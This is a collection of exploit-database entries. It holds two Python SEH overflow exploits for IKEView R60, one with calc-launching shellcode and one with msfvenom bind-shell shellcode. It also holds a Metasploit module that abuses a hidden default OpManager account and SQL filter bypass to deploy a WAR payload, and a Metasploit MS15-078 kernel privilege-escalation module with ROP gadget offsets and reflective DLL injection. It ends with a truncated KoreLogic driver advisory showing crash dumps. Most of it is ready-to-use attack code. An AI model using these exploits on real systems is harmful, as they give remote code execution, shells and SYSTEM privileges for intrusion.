# Exploit Title: IKEView.exe R60 localSEH Exploit # Date: 17/09/2015 # Exploit Author: cor3sm4sh3r # Author email: cor3sm4sh3r[at]gmail.com # Contact: https://in.linkedin.com/pub/shravan-kumar-ceh-oscp/103/414/450 # Category: Local #[+] Gr337z: hyp3rlinx for finding the bug #[+] Source: #http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt # exploit as been tested on win XP professional sp2 #Vendor: #================================ #www.checkpoint.com #http://pingtool.org/downloads/IKEView.exe #!/usr/bin/env python file="IKEView.elg" x=open(file,"w") nseh = "\x90\x90\xeb\x32" #short jump seh = "\xc0\x28\x40\x00" #pop pop ret nopsled = "\x90"*50 #badchars += "\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" buf = "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register buf += "\x50" #=> PUSH EAX | Push EAX to have null-byte padding for "calc.exe" buf += "\x68\x2E\x65\x78\x65" #=> PUSH ".exe" | Push The ASCII string to the stack buf += "\x68\x63\x61\x6C\x63" #=> PUSH "calc" | buf += "\x8B\xC4" #=> MOV EAX,ESP | Put a pointer to the ASCII string in EAX buf += "\x6A\x01" #=> PUSH 1 | Push uCmdShow parameter to the stack buf += "\x50" #=> PUSH EAX | Push the pointer to lpCmdLine to the stack buf += "\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d | Move the pointer to WinExec() into EBX buf += "\xFF\xD3" #=> CALL EBX buf += "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register buf += "\x50" #=> PUSH EAX | Push EAX buf += "\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2 | Exit process buf += "\xFF\xD3" #=> CALL EBX junk = "A"*(4424) payload = junk + nseh + seh + nopsled + buf x.write(payload) x.close()

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote # It removes large object in database, shoudn't be a problem, but just in case.... Rank = ManualRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'ManageEngine OpManager Remote Code Execution', 'Description' => %q{ This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account has a default password of "plugin" which can not be reset through the user interface. By log-in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This module has been tested successfully on OpManager v11.5 and v11.6 for Windows. }, 'License' => MSF_LICENSE, 'Author' => [ 'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module ], 'References' => [ [ 'EDB', '38174' ], ], 'Platform' => ['java'], 'Arch' => ARCH_JAVA, 'Targets' => [ ['ManageEngine OpManager v11.6', {}] ], 'Privileged' => false, 'DisclosureDate' => 'Sep 14 2015', 'DefaultTarget' => 0)) end def uri target_uri.path end def check # Check version vprint_status("#{peer} - Trying to detect ManageEngine OpManager") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'LoginPage.do') }) unless res && res.code == 200 return Exploit::CheckCode::Safe end if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/ version = $1 if Gem::Version.new(version) <= Gem::Version.new('11.6') return Exploit::CheckCode::Appears else # Patch unknown return Exploit::CheckCode::Detected end elsif res.body =~ /OpManager/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def sql_query( key, query ) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'api', 'json', 'admin', 'SubmitQuery'), 'vars_get' => { 'apiKey' => key }, 'vars_post' => { 'query' => query } }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Query was not succesful!") end res end def exploit print_status("#{peer} - Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'jsp', 'Login.do'), 'vars_post' => { 'domainName' => 'NULL', 'authType' => 'localUserLogin', 'userName' => 'IntegrationUser', # Hidden user 'password' => 'plugin' # Password of hidden user } }) if res && res.code == 302 redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "") print_status("#{peer} - Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process print_status("#{peer} - Following redirection") res = send_request_cgi({ 'uri' => redirect, 'method' => 'GET' }) if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/ api_key = $1 print_status("#{peer} - Retrieved API key [ #{api_key} ]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed!") end app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '') print_status("#{peer} - Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' sql_query(api_key, sql) # Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks. sql = 'SELECT lo_create(-1)' result = sql_query(api_key, sql) if result.body =~ /lo_create":([0-9]+)}/ lo_id = $1 else fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!") end # Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager'sa checks for INSERT/UPDATE/DELETE, etc. sql = "INSERT/**/INTO pg_largeobject (loid,pageno,data) VALUES(#{lo_id}, 0, DECODE('#{war_payload_base64}', 'base64'))" sql_query(api_key, sql) # Export our large object id data into a WAR file sql = "SELECT lo_export(#{lo_id}, '..//..//tomcat//webapps//#{app_base}.war');" sql_query(api_key, sql) # Remove our large object in the database sql = 'SELECT lo_unlink(-1)' sql_query(api_key, sql) register_file_for_cleanup("tomcat//webapps//#{app_base}.war") register_file_for_cleanup("tomcat//webapps//#{app_base}") 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end

#!/usr/bin/python # EXPLOIT TITLE: IKEView R60 Buffer overflow(SEH) Local Exploit # AUTHOR: VIKRAMADITYA "-OPTIMUS" # Credits: hyp3rlinx # Date of Testing: 17th September 2015 # Download Link : https://www.exploit-db.com/apps/e74a3dcf9bd8a2dd05026532fbf9bb36-IKEView.exe # Tested On : Windows XP Service Pack 2 # Steps to Exploit # Step 1: Execute this python script # Step 2: This script will create a file called key.elg # Step 3: Open this file with IKEView.exe # That should open a bind tcp port at 4444 # Step 4: Connect with netcat at port 4444 file = open('key.elg' , 'w'); # bad characters - \x09\x0a\x00\x0a\x0b\x0c\x0d\x0e\x0f\x20 buffer = "A"*4424 + "\xEB\x18\x90\x90" + "\xc0\x28\x40\x00" + "\x90" * 30 # msfvenom -p windows/shell_bind_tcp -b '\x09\x0a\x00\x0a\x0b\x0c\x0d\x0e\x0f\x20' -f c buffer += ("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa3\x9f" "\x17\x99\x83\xeb\xfc\xe2\xf4\x5f\x77\x95\x99\xa3\x9f\x77\x10" "\x46\xae\xd7\xfd\x28\xcf\x27\x12\xf1\x93\x9c\xcb\xb7\x14\x65" "\xb1\xac\x28\x5d\xbf\x92\x60\xbb\xa5\xc2\xe3\x15\xb5\x83\x5e" "\xd8\x94\xa2\x58\xf5\x6b\xf1\xc8\x9c\xcb\xb3\x14\x5d\xa5\x28" "\xd3\x06\xe1\x40\xd7\x16\x48\xf2\x14\x4e\xb9\xa2\x4c\x9c\xd0" "\xbb\x7c\x2d\xd0\x28\xab\x9c\x98\x75\xae\xe8\x35\x62\x50\x1a" "\x98\x64\xa7\xf7\xec\x55\x9c\x6a\x61\x98\xe2\x33\xec\x47\xc7" "\x9c\xc1\x87\x9e\xc4\xff\x28\x93\x5c\x12\xfb\x83\x16\x4a\x28" "\x9b\x9c\x98\x73\x16\x53\xbd\x87\xc4\x4c\xf8\xfa\xc5\x46\x66" "\x43\xc0\x48\xc3\x28\x8d\xfc\x14\xfe\xf7\x24\xab\xa3\x9f\x7f" "\xee\xd0\xad\x48\xcd\xcb\xd3\x60\xbf\xa4\x60\xc2\x21\x33\x9e" "\x17\x99\x8a\x5b\x43\xc9\xcb\xb6\x97\xf2\xa3\x60\xc2\xf3\xab" "\xc6\x47\x7b\x5e\xdf\x47\xd9\xf3\xf7\xfd\x96\x7c\x7f\xe8\x4c" "\x34\xf7\x15\x99\xb2\xc3\x9e\x7f\xc9\x8f\x41\xce\xcb\x5d\xcc" "\xae\xc4\x60\xc2\xce\xcb\x28\xfe\xa1\x5c\x60\xc2\xce\xcb\xeb" "\xfb\xa2\x42\x60\xc2\xce\x34\xf7\x62\xf7\xee\xfe\xe8\x4c\xcb" "\xfc\x7a\xfd\xa3\x16\xf4\xce\xf4\xc8\x26\x6f\xc9\x8d\x4e\xcf" "\x41\x62\x71\x5e\xe7\xbb\x2b\x98\xa2\x12\x53\xbd\xb3\x59\x17" "\xdd\xf7\xcf\x41\xcf\xf5\xd9\x41\xd7\xf5\xc9\x44\xcf\xcb\xe6" "\xdb\xa6\x25\x60\xc2\x10\x43\xd1\x41\xdf\x5c\xaf\x7f\x91\x24" "\x82\x77\x66\x76\x24\xe7\x2c\x01\xc9\x7f\x3f\x36\x22\x8a\x66" "\x76\xa3\x11\xe5\xa9\x1f\xec\x79\xd6\x9a\xac\xde\xb0\xed\x78" "\xf3\xa3\xcc\xe8\x4c") file.write(buffer) file.close()

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = ManualRanking WIN32K_VERSIONS = [ '6.3.9600.17393', '6.3.9600.17630', '6.3.9600.17694', '6.3.9600.17796', '6.3.9600.17837', '6.3.9600.17915' ] NT_VERSIONS = [ '6.3.9600.17415', '6.3.9600.17630', '6.3.9600.17668', '6.3.9600.17936' ] include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow', 'Description' => %q{ This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing a malformed font. The vulnerability was exploited by the hacking team and disclosed on the july data leak. This module has been tested successfully on vulnerable builds of Windows 8.1 x64. }, 'License' => MSF_LICENSE, 'Author' => [ 'Eugene Ching', # vulnerability discovery and exploit 'Mateusz Jurczyk', # vulnerability discovery 'Cedric Halbronn', # vulnerability and exploit analysis 'juan vazquez' # msf module ], 'Arch' => ARCH_X86_64, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows 8.1 x64', { } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ ['CVE', '2015-2426'], ['CVE', '2015-2433'], ['MSB', 'MS15-078'], ['MSB', 'MS15-080'], ['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'], ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'], ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'], ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480'] ], 'DisclosureDate' => 'Jul 11 2015', 'DefaultTarget' => 0 })) end def patch_win32k_offsets(dll) @win32k_offsets.each do |k, v| case k when 'info_leak' dll.gsub!([0xdeedbeefdeedbe00].pack('Q<'), [v].pack('Q<')) when 'pop_rax_ret' dll.gsub!([0xdeedbeefdeedbe01].pack('Q<'), [v].pack('Q<')) when 'xchg_rax_rsp' dll.gsub!([0xdeedbeefdeedbe02].pack('Q<'), [v].pack('Q<')) when 'allocate_pool' dll.gsub!([0xdeedbeefdeedbe03].pack('Q<'), [v].pack('Q<')) when 'pop_rcx_ret' dll.gsub!([0xdeedbeefdeedbe04].pack('Q<'), [v].pack('Q<')) when 'deref_rax_into_rcx' dll.gsub!([0xdeedbeefdeedbe05].pack('Q<'), [v].pack('Q<')) when 'mov_rax_into_rcx' dll.gsub!([0xdeedbeefdeedbe06].pack('Q<'), [v].pack('Q<')) when 'pop_rbx_ret' dll.gsub!([0xdeedbeefdeedbe07].pack('Q<'), [v].pack('Q<')) when 'ret' dll.gsub!([0xdeedbeefdeedbe08].pack('Q<'), [v].pack('Q<')) when 'mov_rax_r11_ret' dll.gsub!([0xdeedbeefdeedbe09].pack('Q<'), [v].pack('Q<')) when 'add_rax_rcx_ret' dll.gsub!([0xdeedbeefdeedbe0a].pack('Q<'), [v].pack('Q<')) when 'pop_rsp_ret' dll.gsub!([0xdeedbeefdeedbe0b].pack('Q<'), [v].pack('Q<')) when 'xchg_rax_rsp_adjust' dll.gsub!([0xdeedbeefdeedbe0c].pack('Q<'), [v].pack('Q<')) when 'chwnd_delete' dll.gsub!([0xdeedbeefdeedbe0d].pack('Q<'), [v].pack('Q<')) end end end def set_win32k_offsets @win32k_offsets ||= Proc.new do |version| case version when '6.3.9600.17393' { 'info_leak' => 0x3cf00, 'pop_rax_ret' => 0x19fab, # pop rax # ret # 58 C3 'xchg_rax_rsp' => 0x6121, # xchg eax, esp # ret # 94 C3 'allocate_pool' => 0x352220, # import entry nt!ExAllocatePoolWithTag 'pop_rcx_ret' => 0x98156, # pop rcx # ret # 59 C3 'deref_rax_into_rcx' => 0xc432f, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3 'mov_rax_into_rcx' => 0xc4332, # mov [rcx], rax # ret # 48 89 01 C3 'pop_rbx_ret' => 0x14db, # pop rbx # ret # 5B C3 'ret' => 0x6e314, # ret C3 'mov_rax_r11_ret' => 0x7018e, # mov rax, r11 # ret # 49 8B C3 C3 'add_rax_rcx_ret' => 0xee38f, # add rax, rcx # ret # 48 03 C1 C3 'pop_rsp_ret' => 0xbc8f, # pop rsp # ret # 5c c3 'xchg_rax_rsp_adjust' => 0x189a3a, # xchg esp, eax # sbb al, 0 # mov eax, ebx # add rsp, 20h # pop rbx # ret # 94 1C 00 8B C3 48 83 c4 20 5b c3 'chwnd_delete' => 0x165010 # CHwndTargetProp::Delete } when '6.3.9600.17630' { 'info_leak' => 0x3d200, 'pop_rax_ret' => 0x19e9b, # pop rax # ret # 58 C3 'xchg_rax_rsp' => 0x6024, # xchg eax, esp # ret # 94 C3 'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag 'pop_rcx_ret' => 0x84f4f, # pop rcx # ret # 59 C3 'deref_rax_into_rcx' => 0xc3f7f, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3 'mov_rax_into_rcx' => 0xc3f82, # mov [rcx], rax # ret # 48 89 01 C3 'pop_rbx_ret' => 0x14db, # pop rbx # ret # 5B C3 'ret' => 0x14dc, # ret C3 'mov_rax_r11_ret' => 0x7034e, # mov rax, r11 # ret # 49 8B C3 C3 'add_rax_rcx_ret' => 0xed33b, # add rax, rcx # ret # 48 03 C1 C3 'pop_rsp_ret' => 0xbb93, # pop rsp # ret # 5c c3 'xchg_rax_rsp_adjust' => 0x17c78c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3 'chwnd_delete' => 0x146EE0 # CHwndTargetProp::Delete } when '6.3.9600.17694' { 'info_leak' => 0x3d300, 'pop_rax_ret' => 0x151f4, # pop rax # ret # 58 C3 'xchg_rax_rsp' => 0x600c, # xchg eax, esp # ret # 94 C3 'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag 'pop_rcx_ret' => 0x2cf10, # pop rcx # ret # 59 C3 'deref_rax_into_rcx' => 0xc3757, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3 'mov_rax_into_rcx' => 0xc375a, # mov [rcx], rax # ret # 48 89 01 C3 'pop_rbx_ret' => 0x6682, # pop rbx # ret # 5B C3 'ret' => 0x6683, # ret C3 'mov_rax_r11_ret' => 0x7010e, # mov rax, r11 # ret # 49 8B C3 C3 'add_rax_rcx_ret' => 0xecd7b, # add rax, rcx # ret # 48 03 C1 C3 'pop_rsp_ret' => 0x71380, # pop rsp # ret # 5c c3 'xchg_rax_rsp_adjust' => 0x178c84, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3 'chwnd_delete' => 0x1513D8 # CHwndTargetProp::Delete } when '6.3.9600.17796' { 'info_leak' => 0x3d000, 'pop_rax_ret' => 0x19e4f, # pop rax # ret # 58 C3 'xchg_rax_rsp' => 0x5f64, # xchg eax, esp # ret # 94 C3 'allocate_pool' => 0x352220, # import entry nt!ExAllocatePoolWithTag 'pop_rcx_ret' => 0x97a5e, # pop rcx # ret # 59 C3 'deref_rax_into_rcx' => 0xc3aa7, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3 'mov_rax_into_rcx' => 0xc3aaa, # mov [rcx], rax # ret # 48 89 01 C3 'pop_rbx_ret' => 0x1B20, # pop rbx # ret # 5B C3 'ret' => 0x1B21, # ret C3 'mov_rax_r11_ret' => 0x7010e, # mov rax, r11 # ret # 49 8B C3 C3 'add_rax_rcx_ret' => 0xecf8b, # add rax, rcx # ret # 48 03 C1 C3 'pop_rsp_ret' => 0x29fd3, # pop rsp # ret # 5c c3 'xchg_rax_rsp_adjust' => 0x1789e4, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3 'chwnd_delete' => 0x150F58 # CHwndTargetProp::Delete } when '6.3.9600.17837' { 'info_leak' => 0x3d800, 'pop_rax_ret' => 0x1a51f, # pop rax # ret # 58 C3 'xchg_rax_rsp' => 0x62b4, # xchg eax, esp # ret # 94 C3 'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag 'pop_rcx_ret' => 0x97a4a, # pop rcx # ret # 59 C3 'deref_rax_into_rcx' => 0xc3687, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3 'mov_rax_into_rcx' => 0xc368a, # mov [rcx], rax # ret # 48 89 01 C3 'pop_rbx_ret' => 0x14db, # pop rbx # ret # 5B C3 'ret' => 0x14dc, # ret C3 'mov_rax_r11_ret' => 0x94871, # mov rax, r11 # ret # 49 8B C3 C3 'add_rax_rcx_ret' => 0xecbdb, # add rax, rcx # ret # 48 03 C1 C3 'pop_rsp_ret' => 0xbd2c, # pop rsp # ret # 5c c3 'xchg_rax_rsp_adjust' => 0x15e84c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3 'chwnd_delete' => 0x15A470 # CHwndTargetProp::Delete } when '6.3.9600.17915' { 'info_leak' => 0x3d800, 'pop_rax_ret' => 0x1A4EF, # pop rax # ret # 58 C3 'xchg_rax_rsp' => 0x62CC, # xchg eax, esp # ret # 94 C3 'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag 'pop_rcx_ret' => 0x9765A, # pop rcx # ret # 59 C3 'deref_rax_into_rcx' => 0xC364F, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3 'mov_rax_into_rcx' => 0xC3652, # mov [rcx], rax # ret # 48 89 01 C3 'pop_rbx_ret' => 0x14DB, # pop rbx # ret # 5B C3 'ret' => 0x14DC, # ret # C3 'mov_rax_r11_ret' => 0x7060e, # mov rax, r11 # ret # 49 8B C3 C3 'add_rax_rcx_ret' => 0xECDCB, # add rax, rcx # 48 03 C1 C3 'pop_rsp_ret' => 0xbe33, # pop rsp # ret # 5c c3 'xchg_rax_rsp_adjust' => 0x15e5fc, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3 'chwnd_delete' => 0x15A220 # CHwndTargetProp::Delete } else nil end end.call(@win32k) end def patch_nt_offsets(dll) @nt_offsets.each do |k, v| case k when 'set_cr4' dll.gsub!([0xdeedbeefdeedbe0e].pack('Q<'), [v].pack('Q<')) when 'allocate_pool_with_tag' dll.gsub!([0xdeedbeefdeedbe0f].pack('Q<'), [v].pack('Q<')) end end end def set_nt_offsets @nt_offsets ||= Proc.new do |version| case version when '6.3.9600.17415' { 'set_cr4' => 0x38a3cc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3 'allocate_pool_with_tag' => 0x2a3a50 # ExAllocatePoolWithTag } when '6.3.9600.17630' { 'set_cr4' => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3 'allocate_pool_with_tag' => 0x2A3A50 # ExAllocatePoolWithTag } when '6.3.9600.17668' { 'set_cr4' => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3 'allocate_pool_with_tag' => 0x2A3A50 # ExAllocatePoolWithTag } when '6.3.9600.17936' { 'set_cr4' => 0x3863bc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3 'allocate_pool_with_tag' => 0x29FA50 # ExAllocatePoolWithTag } else nil end end.call(@ntoskrnl) end def atmfd_version file_path = expand_path('%windir%') << '\\system32\\atmfd.dll' major, minor, build, revision, branch = file_version(file_path) return nil if major.nil? ver = "#{major}.#{minor}.#{build}.#{revision}" vprint_status("atmfd.dll file version: #{ver} branch: #{branch}") ver end def win32k_version file_path = expand_path('%windir%') << '\\system32\\win32k.sys' major, minor, build, revision, branch = file_version(file_path) return nil if major.nil? ver = "#{major}.#{minor}.#{build}.#{revision}" vprint_status("win32k.sys file version: #{ver} branch: #{branch}") ver end def ntoskrnl_version file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe' major, minor, build, revision, branch = file_version(file_path) return nil if major.nil? ver = "#{major}.#{minor}.#{build}.#{revision}" vprint_status("ntoskrnl.exe file version: #{ver} branch: #{branch}") ver end def check # We have tested only windows 8.1 if sysinfo['OS'] !~ /Windows 8/i return Exploit::CheckCode::Unknown end # We have tested only 64 bits if sysinfo['Architecture'] !~ /(wow|x)64/i return Exploit::CheckCode::Unknown end atmfd = atmfd_version # atmfd 5.1.2.238 => Works unless atmfd && Gem::Version.new(atmfd) <= Gem::Version.new('5.1.2.243') return Exploit::CheckCode::Safe end # win32k.sys 6.3.9600.17393 => Works @win32k = win32k_version unless @win32k && WIN32K_VERSIONS.include?(@win32k) return Exploit::CheckCode::Detected end # ntoskrnl.exe 6.3.9600.17415 => Works @ntoskrnl = ntoskrnl_version unless @ntoskrnl && NT_VERSIONS.include?(@ntoskrnl) return Exploit::CheckCode::Unknown end Exploit::CheckCode::Appears end def exploit print_status('Checking target...') if is_system? fail_with(Failure::None, 'Session is already elevated') end check_result = check if check_result == Exploit::CheckCode::Safe fail_with(Failure::NotVulnerable, 'Target not vulnerable') end if check_result == Exploit::CheckCode::Unknown fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') end if check_result == Exploit::CheckCode::Detected fail_with(Failure::NotVulnerable, 'ROP chain not available for the target nt/win32k') end unless get_target_arch == ARCH_X86_64 fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') end print_status("Exploiting with win32k #{@win32k} and nt #{@ntoskrnl}...") set_win32k_offsets fail_with(Failure::NoTarget, 'win32k.sys offsets not available') if @win32k_offsets.nil? set_nt_offsets fail_with(Failure::NoTarget, 'ntoskrnl.exe offsets not available') if @nt_offsets.nil? begin print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError # Sandboxes could not allow to create a new process # stdapi_sys_process_execute: Operation failed: Access is denied. print_status('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-2426', 'reflective_dll.x64.dll') library_path = ::File.expand_path(library_path) print_status("Reflectively injecting the exploit DLL into #{process.pid}...") dll = '' ::File.open(library_path, 'rb') { |f| dll = f.read } patch_win32k_offsets(dll) patch_nt_offsets(dll) exploit_mem, offset = inject_dll_data_into_process(process, dll) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status('Payload injected. Executing exploit...') process.thread.create(exploit_mem + offset, payload_mem) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end

KL-001-2015-005 : VBox Satellite Express Arbitrary Write Privilege Escalation Title: VBox Satellite Express Arbitrary Write Privilege Escalation Advisory ID: KL-001-2015-005 Publication Date: 2015.09.16 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-005.txt 1. Vulnerability Details Affected Vendor: VBox Communications Affected Product: Satellite Express Protocol Affected Version: 2.3.17.3 Platform: Microsoft Windows XP SP3, Microsoft Windows 7 (x86) CWE Classification: CWE-123: Write-what-where condition Impact: Arbitrary Code Execution Attack vector: IOCTL CVE-ID: CVE-2015-6923 2. Vulnerability Description A vulnerability within the ndvbs module allows an attacker to inject memory they control into an arbitrary location they define. This vulnerability can be used to overwrite function pointers in HalDispatchTable resulting in an elevation of privilege. 3. Technical Description Example against Windows XP: Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Built by: 2600.xpsp_sp3_qfe.101209-1646 Machine Name: Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0 Debug session time: Tue Mar 10 18:57:54.259 2015 (UTC - 7:00) System Uptime: 0 days 0:11:19.843 ********************************************************************* * * * Bugcheck Analysis * * * ********************************************************************* Use !analyze -v to get detailed debugging information. BugCheck 50, {b41c5d4c, 0, 805068e1, 0} Probably caused by : ndvbs.sys ( ndvbs+94f ) Followup: MachineOwner --------- kd> kn Call stack: # ChildEBP RetAddr 00 f64fda98 8051cc7f nt!KeBugCheckEx+0x1b 01 f64fdaf8 805405d4 nt!MmAccessFault+0x8e7 02 f64fdaf8 805068e1 nt!KiTrap0E+0xcc 03 f64fdbb0 80506aae nt!MmMapLockedPagesSpecifyCache+0x211 04 f64fdbd0 f650e94f nt!MmMapLockedPages+0x18 05 f64fdc34 804ee129 ndvbs+0x94f 06 f64fdc44 80574e56 nt!IopfCallDriver+0x31 07 f64fdc58 80575d11 nt!IopSynchronousServiceTail+0x70 08 f64fdd00 8056e57c nt!IopXxxControlFile+0x5e7 09 f64fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a 0a f64fdd34 7c90e514 nt!KiFastCallEntry+0xf8 0b 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet 0c 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc 0d 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a 0e 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866 0f 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88 10 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e 11 0021f6c0 1e07bd9c _ctypes+0x54d8 12 00000000 00000000 python27!PyObject_Call+0x4c Example against Windows 7: Microsoft (R) Windows Debugger Version 6.3.9600.17298 X86 Copyright (c) Microsoft Corporation. All rights reserved. Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Personal Built by: 7601.17514.x86fre.win7sp1_rtm.101119-1850 Kernel base = 0x8280c000 PsLoadedModuleList = 0x82956850 Debug session time: Tue Sep 15 15:08:38.938 2015 (UTC - 7:00) System Uptime: 0 days 0:27:26.358 kd> .symfix;.reload Loading Kernel Symbols ............................................................... ................................................................ ........................ Loading User Symbols Loading unloaded module list ........ kd> !analyze -v ********************************************************************** * * * Bugcheck Analysis * * * ********************************************************************** KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e) This is a very common bugcheck. Usually the exception address pinpoints the driver/function that caused the problem. Always note this address as well as the link date of the driver/image that contains this address. Some common problems are exception code 0x80000003. This means a hard coded breakpoint or assertion was hit, but this system was booted /NODEBUG. This is not supposed to happen as developers should never have hardcoded breakpoints in retail code, but ... If this happens, make sure a debugger gets connected, and the system is booted /DEBUG. This will let us see why this breakpoint is happening. Arguments: Arg1: c0000005, The exception code that was not handled Arg2: 929ef938, The address that the exception occurred at Arg3: 974f4a34, Trap Frame Arg4: 00000000 Debugging Details: ------------------ EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. FAULTING_IP: ndvbs+938 929ef938 8b4604 mov eax,dword ptr [esi+4] TRAP_FRAME: 974f4a34 -- (.trap 0xffffffff974f4a34) ErrCode = 00000000 eax=00000000 ebx=85490880 ecx=85de2ae0 edx=85490810 esi=85490810 edi=8460a668 eip=929ef938 esp=974f4aa8 ebp=974f4afc iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 ndvbs+0x938: 929ef938 8b4604 mov eax,dword ptr 